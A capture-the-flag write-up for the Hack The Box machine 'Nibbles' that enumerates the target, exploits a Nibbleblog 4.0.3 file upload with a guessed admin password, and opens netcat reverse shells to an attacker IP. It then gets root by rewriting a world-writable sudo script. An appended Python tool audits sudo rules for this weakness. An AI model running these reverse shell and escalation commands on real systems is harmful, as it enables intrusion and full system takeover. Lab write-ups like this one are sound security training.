HTB - Nibbles

Getting Root

Tools Used: Nmap, Dirsearch, Searchsploit

Enumeration
nmap -sC -sV -p- -oA nmap/allports 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 21:50 EDT
Nmap scan report for 10.10.10.75
Host is up (0.061s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo dirsearch -u http://10.10.10.75/nibbleblog -E
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8674
Error Log: /opt/dirsearch/logs/errors-20-04-13_21-56-23.log
Target: http://10.10.10.75/nibbleblog
[21:56:23] Starting:
[21:56:25] 403 - 308B - /nibbleblog/.ht_wsr.txt
[21:56:25] 403 - 301B - /nibbleblog/.hta
[21:56:25] 403 - 310B - /nibbleblog/.htaccess-dev
[21:56:25] 403 - 312B - /nibbleblog/.htaccess-local
[21:56:25] 403 - 312B - /nibbleblog/.htaccess-marco
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.BAK
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.bak1
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.old
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.orig
[21:56:25] 403 - 313B - /nibbleblog/.htaccess.sample
[21:56:25] 403 - 311B - /nibbleblog/.htaccess.save
[21:56:25] 403 - 310B - /nibbleblog/.htaccess.txt
[21:56:25] 403 - 312B - /nibbleblog/.htaccess_extra
[21:56:25] 403 - 311B - /nibbleblog/.htaccess_orig
[21:56:25] 403 - 309B - /nibbleblog/.htaccess_sc
[21:56:25] 403 - 309B - /nibbleblog/.htaccessBAK
[21:56:25] 403 - 309B - /nibbleblog/.htaccessOLD
[21:56:25] 403 - 310B - /nibbleblog/.htaccessOLD2
[21:56:25] 403 - 307B - /nibbleblog/.htaccess~
[21:56:25] 403 - 305B - /nibbleblog/.htgroup
[21:56:25] 403 - 310B - /nibbleblog/.htpasswd-old
[21:56:25] 403 - 311B - /nibbleblog/.htpasswd_test
[21:56:25] 403 - 307B - /nibbleblog/.htpasswds
[21:56:25] 403 - 305B - /nibbleblog/.htusers
[21:56:31] 301 - 321B - /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/
[21:56:31] 200 - 1KB - /nibbleblog/admin.php
[21:56:31] 200 - 2KB - /nibbleblog/admin/
[21:56:32] 403 - 312B - /nibbleblog/admin/.htaccess
[21:56:32] 200 - 2KB - /nibbleblog/admin/?/login
[21:56:32] 301 - 332B - /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
[21:56:32] 200 - 2KB - /nibbleblog/admin/js/tinymce/
[21:56:50] 301 - 323B - /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
[21:56:57] 200 - 3KB - /nibbleblog/index.php
[21:56:57] 200 - 3KB - /nibbleblog/index.php/login/
[21:56:57] 200 - 78B - /nibbleblog/install.php
[21:56:58] 301 - 325B - /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/
[21:56:59] 200 - 34KB - /nibbleblog/LICENSE.txt
[21:57:06] 301 - 323B - /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/
[21:57:08] 200 - 5KB - /nibbleblog/README
[21:57:14] 301 - 322B - /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
Task Completed
# Found under
http://10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
# Found under
http://10.10.10.75/nibbleblog/content/private/users.xml
Username: admin
(see screenshot below)
# On the admin page
Username: admin
Password: nibbles
# Discovered the creds by guessing
http://10.10.10.75/nibbleblog/admin.php

Exploit

searchsploit Nibbleblog
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog 3 - Multiple SQL Injections | exploits/php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
3. Proof of Concept
Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
Upload PHP shell, ignore warnings
Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9001>/tmp/f

Privilege Escalation

# Checking sudo permissions, we should be able to run a bash script with sudo
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
'(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'
# Checking the directory of the file
nibbler@Nibbles:/home/nibbler$ ls -la
ls -la
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt
# We don't see the personal directory, but we see a zip file
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
# We can see we have full permissions of the bash script
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
# Edited the bash script with the following contents
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 9002>/tmp/f' > monitor.sh
# Executed the script with sudo
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
# Got a shell as root
rlwrap nc -lnvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.75.
Ncat: Connection from 10.10.10.75:45840.
# id
uid=0(root) gid=0(root) groups=0(root)
#
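The root cause of the escalation above is a NOPASSWD sudo rule pointing at a script that the invoking user (and everyone else, given the -rwxrwxrwx mode) can rewrite. The following audit script is an added example written for this page, not code from the writeup or from the box; it parses `sudo -l` output in the shape shown above, checks each NOPASSWD target for world/group writability, non-root ownership, a non-root-controlled parent directory and wildcards, and recreates the box's layout (a world-writable monitor.sh) in a temporary directory as constructed demo data. The sample `sudo -l` text and the `build_demo_layout`/`run_demo` helpers are assumptions made for the demonstration.

```python
"""Audit `sudo -l` output for NOPASSWD targets that a non-root user could modify."""
import os
import re
import stat
import tempfile

# Matches rule lines of the form "(root) NOPASSWD: /path/to/cmd [, /other/cmd]"
NOPASSWD_RE = re.compile(r"\((?P<runas>[^)]+)\)\s+NOPASSWD:\s*(?P<cmds>.+)")

# Constructed sample in the shape of the `sudo -l` output seen above; {script}
# is filled in with the path of the demo file created by build_demo_layout().
SAMPLE_SUDO_L = """Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: {script}
"""


def parse_nopasswd_entries(sudo_l_output):
    """Return (runas, command) pairs for every NOPASSWD rule in `sudo -l` output."""
    entries = []
    for raw in sudo_l_output.splitlines():
        match = NOPASSWD_RE.search(raw.strip().strip("'"))
        if not match:
            continue
        for cmd in match.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd and cmd != "ALL":
                entries.append((match.group("runas"), cmd))
    return entries


def audit_command_path(cmd):
    """Return a list of weaknesses for one sudo target; an empty list means nothing was flagged."""
    findings = []
    path = cmd.split()[0]  # only the executable/script matters, not its arguments
    if any(ch in path for ch in "*?["):
        return ["wildcard in command path"]
    if os.path.exists(path):
        st = os.stat(path)
        if st.st_mode & stat.S_IWOTH:
            findings.append("target is world-writable")
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append("target is writable by non-root group %d" % st.st_gid)
        if st.st_uid != 0:
            findings.append("target is owned by non-root uid %d" % st.st_uid)
    else:
        findings.append("target does not exist (whoever can create it decides what runs as root)")
    # Even a root-owned, mode 755 script is replaceable if its directory is not root-controlled.
    parent = os.path.dirname(path) or "/"
    if os.path.isdir(parent):
        pst = os.stat(parent)
        sticky = bool(pst.st_mode & stat.S_ISVTX)
        if pst.st_uid != 0 or (pst.st_mode & stat.S_IWOTH and not sticky):
            findings.append("parent directory %s is not root-controlled" % parent)
    return findings


def audit_sudo_l(sudo_l_output):
    """Map every NOPASSWD command to its list of findings."""
    return {cmd: audit_command_path(cmd) for _, cmd in parse_nopasswd_entries(sudo_l_output)}


def build_demo_layout(root):
    """Recreate the box's layout under `root`: a world-writable monitor.sh (constructed demo data)."""
    stuff = os.path.join(root, "home", "nibbler", "personal", "stuff")
    os.makedirs(stuff, exist_ok=True)
    script = os.path.join(stuff, "monitor.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho monitoring\n")
    os.chmod(script, 0o777)  # the -rwxrwxrwx mode seen in the ls -la output
    return script


def run_demo():
    """Build the demo tree in a temp dir, audit the sample output against it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        script = build_demo_layout(root)
        return audit_sudo_l(SAMPLE_SUDO_L.format(script=script))


if __name__ == "__main__":
    for cmd, findings in run_demo().items():
        print(cmd)
        for finding in findings or ["no weakness found"]:
            print("  -", finding)
```

Run it as any local user; on a real host feed it `sudo -l` output instead of the sample and it flags every target that a non-root user could swap out. The fix for the case on this box is to have root own the script and its directory with mode 755 (or 750), or to drop the NOPASSWD rule entirely.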